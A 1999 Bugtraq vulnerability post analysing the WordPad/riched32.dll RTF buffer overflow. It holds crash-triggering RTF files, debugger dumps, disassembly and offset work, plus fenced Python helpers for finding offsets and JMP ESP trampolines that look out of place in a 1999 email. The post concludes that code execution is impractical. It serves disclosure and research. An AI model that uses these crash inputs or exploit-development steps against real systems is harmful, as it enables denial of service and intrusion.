[12684] in bugtraq


Re: WordPad/riched20.dll buffer overflow - Full Details

daemon@ATHENA.MIT.EDU (Solar Eclipse)
Mon Nov 22 17:04:20 1999

Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Message-Id:  <3837BDC36D.7BA1SOLARECLIPSE@smtp.softhome.net>
Date:         Sun, 21 Nov 1999 03:39:15 -0600
Reply-To: Solar Eclipse <solareclipse@SOFTHOME.NET>
From: Solar Eclipse <solareclipse@SOFTHOME.NET>
X-To:         bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <Pine.BSF.4.10.9911190014340.83358-100000@Acrid.SchematiX.NET>

I kindly suggest using a fixed width font for your viewing pleasure.


Microsoft Wordpad Buffer Overflow


I. Introduction

The first report was from Pauli Ojanpera <pauli_ojanpera@HOTMAIL.COM>

	Win98/NT4 Riched20.dll (which WordPad uses) has a classic buffer
	overflow problem with ".rtf"-files.

	Crashme.rtf :
	{\rtf\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA}

	A malicious document may probably abuse this to execute arbitary
	code. WordPad crashes with EIP=41414141.

Thomas Dullien <dullien@GMX.DE> did some very good research on this
buffer overflow. Unfortunately I received his vuln-dev post after I
was deep into the Wordpad code, so I had already discovered most of the
details that he posted.

II. Research

     Ok, let's try to exploit this shit. First, try to crash Wordpad.
Create the following file:

{\rtf\AAAAAAAAAA(100 'A's)}

I am using SoftIce to inspect the situation after the crash.
First, take a look at the registers and the stack.

EIP=61616161
ESP=0012F044
EBP=61616161
                                  ebp      eip
0023:0012F024 0012F104 00000102 61616161 61616161   ........aaaaaaaa
0023:0012F034 0000001B 00000246 0012F044 00000023   ....F...D...#...
0023:0012F044 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
0023:0012F054 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
0023:0012F064 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
0023:0012F074 61616161 61616161 00000000 00000000   aaaaaaaa........

We can assume that EBP was popped from the stack and then RET 10 was
executed: it pops EIP and then adds another 10 (hex) to the stack pointer.
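
The stack arithmetic behind this assumption can be checked with a few lines
of Python. This is only a sketch: the slot address 0012F030 is read off the
dump above (the dword under the "eip" label), and the helper name is made up
for illustration.

```python
def esp_after_ret(ret_slot, imm):
    """ESP after 'RET imm': pop the 4-byte return address, then skip imm more bytes."""
    return ret_slot + 4 + imm

# Return address slot taken from the dump above: 0012F024 + 0x0C = 0012F030.
print(hex(esp_after_ret(0x0012F030, 0x10)))
```

The result matches the ESP value reported by SoftIce after the crash.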

To check if this is the case, try the following:

{\rtf\AAAABBBBCCCCDDDDEEEEFFFF(...to ZZZZ)}

Wordpad crashes again. The registers and the stack are as follows:

ESP=0012F054
EBP=6A6A6A6A 'jjjj'
EIP=6B6B6B6B 'kkkk'

                                  ebp      eip
0023:0012F034 0012F114 00000102 6a6a6a6a 6b6b6b6b   ........jjjjkkkk
0023:0012F044 0000001B 00000246 0012F054 00000023   ....F...T...#...
0023:0012F054 6C6C6C6C 6D6D6D6D 6E6E6E6E 6F6F6F6F   llllmmmmnnnnoooo
0023:0012F064 70707070 71717171 72727272 73737373   ppppqqqqrrrrssss
0023:0012F074 74747474 75757575 76767676 77777777   ttttuuuuvvvvwwww
0023:0012F084 78787878 79797979 7A7A7A7A 00000200   xxxxyyyyzzzz....

Yes, our assumption was correct. EBP gets its value from 0012F03C, and the
RET 10 instruction gets the EIP from 0012F040.

The buffer is probably 36 characters big, because 'jjjj' (characters 37 to 40) overwrites the saved EBP.
By the way, notice that the characters are lowercased. This means that the
buffer is lowercased before the crash.
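
Finding the offsets by eye works, but it is easy to automate. The following
is a minimal sketch, assuming the same AAAABBBB...ZZZZ pattern as above; the
function names are hypothetical and not part of any tool mentioned here.

```python
import string
import struct

def make_pattern():
    # AAAABBBB...ZZZZ, the same test string used in the RTF file above
    return "".join(ch * 4 for ch in string.ascii_uppercase)

def offset_of(reg_value, pattern):
    # The parser lowercases the tag, and x86 stores dwords little-endian,
    # so turn the register value back into 4 lowercase pattern characters.
    needle = struct.pack("<I", reg_value).decode("ascii")
    return pattern.lower().find(needle)

pattern = make_pattern()
print(offset_of(0x6A6A6A6A, pattern))  # offset of the bytes that landed in EBP
print(offset_of(0x6B6B6B6B, pattern))  # offset of the bytes that landed in EIP
```

The first offset is the number of characters needed to reach the saved EBP,
the second one the number needed to reach the return address.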

Let's try the following file (36 characters):

{\rtf\AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIII}

It shouldn't crash, but it does. This is strange. Take a look at the registers
and the stack: (btw, do a quick check with 35 characters - Wordpad will not crash)

EIP=002E0033
ESP=0012F108
EBP=00200067

0023:0012F0E8 0012F294 6E002F02 00200067 002E0033   ...../.ng. .3...
0023:0012F0F8 0000001B 00000202 0012F108 00000023   ............#...
0023:0012F108 0020002E 006C0070 00610065 00650073   .. .p.l.e.a.s.e.
0023:0012F118 00770020 00690061 00000074 00000000    .w.a.i.t.......
0023:0012F128 00000000 00000000 0000002E 00000000   ................
0023:0012F138 0012F194 5F816876 00000014 00000000   ....vh._........
0023:0012F148 00000000 00000001 029AE0CD 00000064   ............d...
0023:0012F158 0012F1B8 0012F68C 0012F638 5F816850   ........8...Ph._
0023:0012F168 00C14812 00000000 0012F2A4 00000168   .H..........h...
0023:0012F178 0012F292 0012F290 00C15810 0012F1A8   .........X......
0023:0012F188 00C15B3A 00000007 00000006 0012F1CC   :[..............
0023:0012F198 6C026878 0012F294 0012F290 00C11DC8   xh.l............
0023:0012F1A8 61616161 62626262 63636363 64646464   aaaabbbbccccdddd
0023:0012F1B8 65656565 66666666 67676767 68686868   eeeeffffgggghhhh
0023:0012F1C8 7D696969 0012F1E0 6C026B81 0012F290   iii}.....k.l....

This is even stranger. The EBP and EIP are not overwritten by our
string, but they are still smashed.

It's time to find exactly where the code responsible for this mess is.
Notice that the EIP is overwritten and we don't know what code was executed
before the crash. Pauli Ojanpera posted that the crash was in riched20.dll.
Check the loaded DLL-s: there is no riched20.dll, but we see riched32.dll.
This sounds good! At what address is this DLL loaded?

:map32 riched32
Owner       Obj Name  Obj#  Address        Size      Type
RICHED32   .text      0001  001B:6C001000  00027284  CODE  RO

The code is loaded at 6C001000. Where is the buffer overflow? It is probably
located in some function in RICHED32.DLL. This function is probably called
from some other function, which is also called from somewhere. We should
be able to see the return addresses for these previous calls on the stack.
Let's search for something that looks like a return address. At 0012F1D0 we see
the bytes 6C026B81. This looks like an address in RICHED32.DLL, doesn't it?
Go disassemble the bastard!

It is part of a function, starting at 6C026B0B and ending at 6C026B68 (I included
some more code in the middle, more about it later)

001B:6C026B0B push ebp
001B:6C026B0C mov ebp, esp
001B:6C026B0E sub esp, 04
...
001B:6C026B7A mov ecx, esi
001B:6C026B7C call 6C0267D1             ; this is called for each \ tag
001B:6C026B81 mov [edi], eax
...
001B:6C026B64 pop edi
001B:6C026B65 pop esi
001B:6C026B66 mov esp, ebp
001B:6C026B68 ret

Put a breakpoint in the beginning of this function and see what happens.
The 6C026B0B function is called 2 times and crashes the second time.
Trace it step by step, stepping over the calls. The function crashes
after the final RET instruction (located at 6C026B68)

Just before the crash the stack looks like this:

                 edi      esi  local_var  old_ebp
0023:0012F1D4 0012F290 00C13D58 5CC15A30 0012F40C
0023:0012F1E4 6C024DE0  <- ret address

The POP EDI and POP ESI instructions restore these two registers (look at the
disassembly). Then the function restores the ESP (which is saved in EBP at the
beginning of the function). By trying this with a normal RTF file (not causing
a buffer overflow), we see that ESP becomes 0012F1E0. Then EBP is popped
from the stack (it becomes 0012F40C) and the RET instruction returns the
execution flow to 6C024DE0.

This is not the case with a fucked up RTF file. Everything is ok until we hit
the MOV ESP, EBP instruction. The value in the EBP register is not correct, thus
fucking up the ESP and causing a mess.

Ok, now we need to find where in the 6C026B0B function the EBP is smashed.
Put a breakpoint at the beginning of the function and trace it (without stepping
into the calls). The EBP at the beginning of the function is 0012F1E0. It
changes after the CALL 6C0267D1 instruction.

Now we have the function that changes the EBP.

001B:6C0267D1 push ebp
001B:6C0267D2 mov ebp, esp
001B:6C0267D4 sub esp, 24
...

The stack of this function looks like this:

0023:0012F1A8 61616161 62626262 63636363 64646464   aaaabbbbccccdddd
0023:0012F1B8 65656565 66666666 67676767 68686868   eeeeffffgggghhhh
0023:0012F1C8 7D696969 0012F1E0 6C026B81 0012F290   iii}.....k.l....
                         ebp      eip

At 0012F1D0 we have the return address. The EBP is saved at 0012F1CC and
then the stack pointer is decremented by 36 (24 hex), leaving space for 36 bytes
of local variables. Remember this number? This is our buffer!

After some more tracing, we see that the saved ebp is changed because of
001B:6C0268E9 mov byte ptr [ebx], 00
executed right after the buffer is filled with our characters. This
is a NULL termination of the string, which clears the low byte of the saved
ebp and changes it from 0012F1E0 to 0012F100.
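
The effect of that single zero byte can be reproduced with a toy model of
the stack frame. This is a simplified sketch, not the real RICHED32 code: it
treats the 36 bytes of locals as one flat buffer, ignores the temporary
character stored at [ebp-01], and takes the saved EBP and return address
values from the dump above. The function name is hypothetical.

```python
import struct

FRAME_SIZE = 0x24          # sub esp, 24 (hex) = 36 bytes of locals

def saved_ebp_after_copy(tag, saved_ebp=0x0012F1E0, ret=0x6C026B81):
    # Frame layout, low to high addresses: locals, saved EBP, return address.
    frame = bytearray(FRAME_SIZE) + struct.pack("<II", saved_ebp, ret)
    data = tag.lower().encode("ascii")
    if len(data) >= len(frame):
        raise ValueError("tag too long for this toy model")
    frame[:len(data)] = data            # the unchecked copy
    frame[len(data)] = 0                # mov byte ptr [ebx], 00
    return struct.unpack_from("<I", frame, FRAME_SIZE)[0]

print(hex(saved_ebp_after_copy("A" * 35)))  # terminator stays inside the locals
print(hex(saved_ebp_after_copy("A" * 36)))  # terminator hits the saved EBP
```

With 35 characters the saved EBP survives, with 36 its low byte is zeroed,
which matches the observation that 35 characters do not crash Wordpad.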

Let's do some more reverse engineering. From 6C0268AE to 6C0268DB we have
a loop that reads our string and copies it into the buffer.

001B:6C0268AE mov al, [ecx]             ; get the current char
001B:6C0268B0 inc ecx                   ; ecx points to the next char
001B:6C0268B1 mov [ebp-01], al          ; store the current char at 0012F1C8
001B:6C0268B4 mov [esi+1C], ecx         ; store ecx at 0012F2AC
001B:6C0268B7 mov eax, 00000001         ; what the fuck?
001B:6C0268BC test eax, eax
001B:6C0268BE jc 6C0268E9               ; this is never executed
001B:6C0268C0 movzx eax, byte ptr [ebp-01]      ; get the current char
001B:6C0268C4 test byte ptr [eax+6C00C6B8], 01  ; is it 'A'-'Z' or 'a'-'z' ?
001B:6C0268CB jz 6C0268E9                       ; no -> go there
001B:6C0268CD mov al, [ebp-01]          ; get the current char
001B:6C0268D0 or al, 20                 ; make it lowercase
001B:6C0268D2 mov [ebx], al             ; store it in the buffer
001B:6C0268D4 inc ebx
001B:6C0268D5 mov ecx, [esi+1c]         ; restore ecx
001B:6C0268D8 cmp [esi+18], ecx         ; reached the end of the string?
001B:6C0268DB jnz 6C0268AE              ; no -> loop again

ECX is a pointer to the memory location where the RTF file is loaded. It
points to the character that we are currently copying. EBX points to the
buffer. The buffer starts at 0012F1A8.

By the way, notice that the current character is stored at [ebp-01], the last
byte of the dword at 0012F1C8 (the third line in the disassembly). This means
that our buffer is only 32 bytes long, and we have another local variable after
it. This doesn't really matter, because the copying process works even if we
overwrite this variable (it gets restored). If we put some shellcode there, we
need to know that this particular byte will be changed to the first character
after the end of the string. In our case, this is '}'

Notice the "test byte ptr [eax+6C00C6B8], 01" instruction. At this
memory location (6C00C6B8) we have an array of bytes, corresponding to each
ASCII value.

The array at 6C00C6B8
+00      00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+10      00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+20      00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+30      06 06 06 06 06 06 06 06-06 06 00 00 00 00 00 00
+40      00 05 05 05 05 05 05 01-01 01 01 01 01 01 01 01
+50      01 01 01 01 01 01 01 01-01 01 01 00 00 00 00 00
+60      00 05 05 05 05 05 05 01-01 01 01 01 01 01 01 01
+70      01 01 01 01 01 01 01 01-01 01 01 00 00 00 00 00
+80      00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+90      00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+A0      00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+B0      00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+C0      00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+D0      00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+E0      00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+F0      00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00

The only ASCII characters that will pass the JZ condition after the TEST
instruction are the letters 'A'-'Z' and 'a'-'z' (ASCII values 41-5A and 61-7A).
If any other character is reached, the copying is ended and the buffer is
NULL terminated.
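
To double check which bytes survive the filter, the table and the loop can
be modelled in Python. This is a sketch under stated assumptions: the table
is rebuilt by hand from the rows printed above, the bounds check on the end
of the file buffer is left out, and the function names are made up.

```python
def build_table():
    # Rebuild the 256-byte array at 6C00C6B8 from the rows printed above.
    table = bytearray(256)
    for c in range(0x30, 0x3A):
        table[c] = 0x06                       # '0'-'9'
    for base in (0x41, 0x61):                 # 'A' and 'a'
        for c in range(base, base + 26):
            # A-F and a-f carry an extra bit (05), the other letters are 01
            table[c] = 0x05 if c < base + 6 else 0x01
    return table

def copied_part(data, table):
    out = bytearray()
    for b in data:
        if not table[b] & 0x01:   # test byte ptr [eax+6C00C6B8], 01 / jz
            break                 # the first non-letter ends the copy
        out.append(b | 0x20)      # or al, 20
    return bytes(out)

table = build_table()
print(bytes(c for c in range(256) if table[c] & 0x01))
print(copied_part(b"AAAAbbbb1CCCC}", table))
```

Only the 52 letters have bit 0 set, and whatever gets through is lowercased,
so the bytes that can reach the stack are limited to 61-7A.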

Next we try really taking over the return address.

{\rtf\AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKAAAAAAAAAAAAAAAAA(more As)}

'jjjj' overwrites the saved EBP and the return address becomes 'kkkk'. After
the overwritten return address, we have more As.

0023:0012F1A8 61616161 62626262 63636363 64646464   aaaabbbbccccdddd
0023:0012F1B8 65656565 66666666 67676767 68686868   eeeeffffgggghhhh
0023:0012F1C8 7D696969 6A6A6A6A 6B6B6B6B 61616161   iii}jjjjkkkkaaaa
0023:0012F1D8 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
0023:0012F1E8 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
0023:0012F1F8 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
0023:0012F208 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
0023:0012F218 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
0023:0012F228 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
0023:0012F238 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
0023:0012F248 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
0023:0012F258 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
0023:0012F268 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
0023:0012F278 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
0023:0012F288 61616161 61616161 00000000 00000000   aaaaaaaa........
0023:0012F298 00000000 00000000 00000000 00000000   ................
0023:0012F2A8 00000000 000C1814 00000000 00000000   ................

At 0012F2AC we have a pointer to the current character in the file buffer.
ECX is saved to this location (referenced as esi+1C) before the copying, and
restored afterwards. This value is updated after every copied byte. If we
overwrite it, it will start pointing to a new memory location. The copy loop
will try to read the bytes to copy from there and probably crash. Even if we
somehow manage to overwrite this with a valid memory pointer, this will be
the last byte copied from our string.

This limits us to 216 'A's after the 'jjjjkkkk'.
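
The number follows directly from the addresses in the dump. A minimal
sketch of the arithmetic, with the constants taken from the text above and
a hypothetical helper name:

```python
BUF_ADDR = 0x0012F1A8        # start of the stack buffer
PTR_ADDR = 0x0012F2AC        # [esi+1C], pointer to the current character
HEADER = 36 + 4 + 4          # locals, saved EBP ('jjjj'), return address ('kkkk')

def payload_room():
    payload_start = BUF_ADDR + HEADER      # first byte after 'kkkk'
    return payload_start, PTR_ADDR - payload_start

start, room = payload_room()
print(hex(start), room)
```

Everything from the first byte after the return address up to, but not
including, the pointer at 0012F2AC is usable.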


III. Is an exploit possible ?

Exploiting this buffer overflow will be hard. Maybe not impossible, but very
hard. We have only 216 bytes to squeeze our shellcode into, and we can use only
26 characters - the letters from 'a' to 'z'.

Writing shellcode with no nulls is hard, writing it with only letters is
almost impossible.
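
To get a feeling for how little is left, here is what the 26 allowed bytes
mean when they appear as the first byte of a 32-bit x86 instruction. The
table is a sketch written from the standard one-byte opcode map, with
informal mnemonics; it is not taken from the Wordpad analysis itself.

```python
# First-byte meaning of 0x61-0x7A in 32-bit protected mode.
LETTER_OPCODES = {
    0x61: "popad", 0x62: "bound", 0x63: "arpl",
    0x64: "fs: prefix", 0x65: "gs: prefix",
    0x66: "operand-size prefix", 0x67: "address-size prefix",
    0x68: "push imm32", 0x69: "imul r32, r/m32, imm32",
    0x6A: "push imm8", 0x6B: "imul r32, r/m32, imm8",
    0x6C: "insb", 0x6D: "insd", 0x6E: "outsb", 0x6F: "outsd",
    0x70: "jo", 0x71: "jno", 0x72: "jb", 0x73: "jae", 0x74: "je",
    0x75: "jne", 0x76: "jbe", 0x77: "ja", 0x78: "js", 0x79: "jns",
    0x7A: "jp",
}

for byte, meaning in sorted(LETTER_OPCODES.items()):
    print(f"{byte:02X} '{chr(byte)}'  {meaning}")
```

There is no MOV, no CALL, no INT and no RET in this list, and every operand
byte has to be a lowercase letter as well.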

First, we need some way of pointing the return address to something useful.
We cannot point it to the stack, because the stack address contains 'prohibited'
characters. After the RET instruction the ESP points to the second part of our
string (the one after 'jjjjkkkk'). We need a JMP ESP or CALL ESP instruction.
The usual approach is to look at the loaded DLL-s at the time of the crash and
to find one of these instructions at some memory location. Then we can point
the return address to this memory location and have it jump back to our shell
code. The problem is that we need the address of this memory location to
consist only of lowercase letters.
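
The search described above is easy to script once a DLL image is dumped to
a file. The following is a rough sketch: FF E4 and FF D4 are the standard
encodings of JMP ESP and CALL ESP, but the function names are hypothetical,
and the image is assumed to be a flat byte string mapped at the given base
(as in a memory dump, not the raw file on disk).

```python
import struct

JMP_ESP = b"\xff\xe4"
CALL_ESP = b"\xff\xd4"

def is_letter_address(addr):
    # All four address bytes must be 'a'-'z', since everything is lowercased.
    return all(0x61 <= b <= 0x7A for b in struct.pack("<I", addr))

def find_trampolines(image, base):
    hits = []
    for needle in (JMP_ESP, CALL_ESP):
        pos = image.find(needle)
        while pos != -1:
            if is_letter_address(base + pos):
                hits.append(base + pos)
            pos = image.find(needle, pos + 1)
    return sorted(hits)

# Synthetic example: an empty image with one usable and one unusable hit.
image = bytearray(0x87000)
image[0x86161:0x86163] = JMP_ESP     # lands at 71616161, all letters
image[0x10:0x12] = CALL_ESP          # lands at 71590010, not usable
print([hex(a) for a in find_trampolines(image, 0x71590000)])
```

The byte search also matches the two opcode bytes inside longer
instructions or data, which is fine for this purpose, because the CPU
decodes whatever bytes sit at the address it is sent to.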

c:\>listdlls.exe wordpad

ListDLLs V2.1
Copyright (C) 1997-1999 Mark Russinovich
http://www.sysinternals.com

------------------------------------------------------------------------------
WORDPAD.EXE pid: 275
  Base        Size      Version         Path
  0x029a0000  0x34000   4.00.1381.0096  C:\Program Files\Windows NT\Accessories\wordpad.exe
  0x77f60000  0x5e000   4.00.1381.0174  C:\WINNT\System32\ntdll.dll
  0x5f800000  0xee000   4.21.0000.7160  C:\WINNT\System32\MFC42u.DLL
  0x78000000  0x40000   6.00.8397.0000  C:\WINNT\system32\MSVCRT.dll
  0x77f00000  0x5e000   4.00.1381.0178  C:\WINNT\system32\KERNEL32.dll
  0x77ed0000  0x2c000   4.00.1381.0115  C:\WINNT\system32\GDI32.dll
  0x77e70000  0x54000   4.00.1381.0133  C:\WINNT\system32\USER32.dll
  0x77dc0000  0x3f000   4.00.1381.0203  C:\WINNT\system32\ADVAPI32.dll
  0x77e10000  0x57000   4.00.1381.0193  C:\WINNT\system32\RPCRT4.dll
  0x77d80000  0x32000   4.00.1381.0133  C:\WINNT\system32\comdlg32.dll
  0x70970000  0x1a8000  4.72.3110.0006  C:\WINNT\system32\SHELL32.dll
  0x70bd0000  0x44000   5.00.2314.1000  C:\WINNT\system32\SHLWAPI.dll
  0x71590000  0x87000   5.80.2314.1000  C:\WINNT\system32\COMCTL32.dll
  0x77b20000  0xb6000   4.00.1381.0190  C:\WINNT\system32\ole32.dll
  0x76aa0000  0x6000    4.00.1371.0001  C:\WINNT\System32\INDICDLL.dll
  0x77c00000  0x18000   4.00.1381.0027  C:\WINNT\System32\WINSPOOL.DRV
  0x775a0000  0x14000   0.02.0000.0000  C:\WINNT\System32\spool\DRIVERS\W32X86\2\RASDDUI.DLL
  0x6c000000  0x2e000   4.00.0993.0004  C:\WINNT\System32\RICHED32.dll
  0x70400000  0x77000   5.00.2314.1000  C:\WINNT\System32\mlang.dll

These are the loaded DLLs that we can use. The perfect DLL would be the same on
Windows 95, 98, SE, NT 4 with all service packs and on Win2K. Unfortunately
such a DLL is just a dream. Our choices are really limited. Looking at the base
addresses, we can eliminate most of the DLLs, because they don't have letter
addresses. This leaves us with only one DLL that we can use:

  0x71590000  0x87000   5.80.2314.1000  C:\WINNT\system32\COMCTL32.dll

We can only use the code in the range from 71616161 to 71616F7A (the image ends at 71617000).
After disassembling the DLL and looking at the code, we clearly see that there
is no JMP ESP or CALL ESP instruction.
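
The elimination of the other DLLs can be verified mechanically. This is a
minimal sketch, assuming the base addresses and sizes from the ListDLLs
output above; it only checks which addresses are reachable, not what code
lives there. Because it clips every module at base + size, the upper bound
it reports for COMCTL32.dll is 71616F7A.

```python
from bisect import bisect_left
from itertools import product

LETTERS = range(0x61, 0x7B)   # 'a'..'z'
# Every 32-bit address made only of lowercase letters, in ascending order.
ALL_LETTER_ADDRS = [
    (a << 24) | (b << 16) | (c << 8) | d
    for a, b, c, d in product(LETTERS, repeat=4)
]

# (base, size) pairs copied from the ListDLLs output above.
MODULES = {
    "wordpad.exe": (0x029A0000, 0x34000), "ntdll.dll": (0x77F60000, 0x5E000),
    "MFC42u.DLL": (0x5F800000, 0xEE000), "MSVCRT.dll": (0x78000000, 0x40000),
    "KERNEL32.dll": (0x77F00000, 0x5E000), "GDI32.dll": (0x77ED0000, 0x2C000),
    "USER32.dll": (0x77E70000, 0x54000), "ADVAPI32.dll": (0x77DC0000, 0x3F000),
    "RPCRT4.dll": (0x77E10000, 0x57000), "comdlg32.dll": (0x77D80000, 0x32000),
    "SHELL32.dll": (0x70970000, 0x1A8000), "SHLWAPI.dll": (0x70BD0000, 0x44000),
    "COMCTL32.dll": (0x71590000, 0x87000), "ole32.dll": (0x77B20000, 0xB6000),
    "INDICDLL.dll": (0x76AA0000, 0x6000), "WINSPOOL.DRV": (0x77C00000, 0x18000),
    "RASDDUI.DLL": (0x775A0000, 0x14000), "RICHED32.dll": (0x6C000000, 0x2E000),
    "mlang.dll": (0x70400000, 0x77000),
}

def letter_range(base, size):
    """Return (lowest, highest, count) of letter-only addresses in the module."""
    lo = bisect_left(ALL_LETTER_ADDRS, base)
    hi = bisect_left(ALL_LETTER_ADDRS, base + size)
    if lo == hi:
        return None
    return ALL_LETTER_ADDRS[lo], ALL_LETTER_ADDRS[hi - 1], hi - lo

for name, (base, size) in MODULES.items():
    found = letter_range(base, size)
    if found:
        print(name, hex(found[0]), hex(found[1]), found[2])
```

Only COMCTL32.dll shows up, and even there just a few hundred addresses are
reachable, which is why the search for a usable instruction is so limited.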

There is no way to execute the shellcode.

Even if we could do it, making the shellcode do something useful would be a
pain in the ass. The restrictions are too harsh.

After the RET instruction, at ESP-50 we have a pointer to the beginning of the
buffer, where the raw file is loaded. This buffer holds the raw file
contents, so we can use NULLs and non-letter characters. Unfortunately, this
buffer is in the heap and we can not execute any code from there. We need to
copy the code to the stack first.

The whole situation sucks. At least the Micro$oft users are saved once
again! But not for long :-)



Solar Eclipse <solareclipse@phreedom.org>
www.phreedom.org

Win32 Security Consultant ;-> Hire me ! Will work for food!
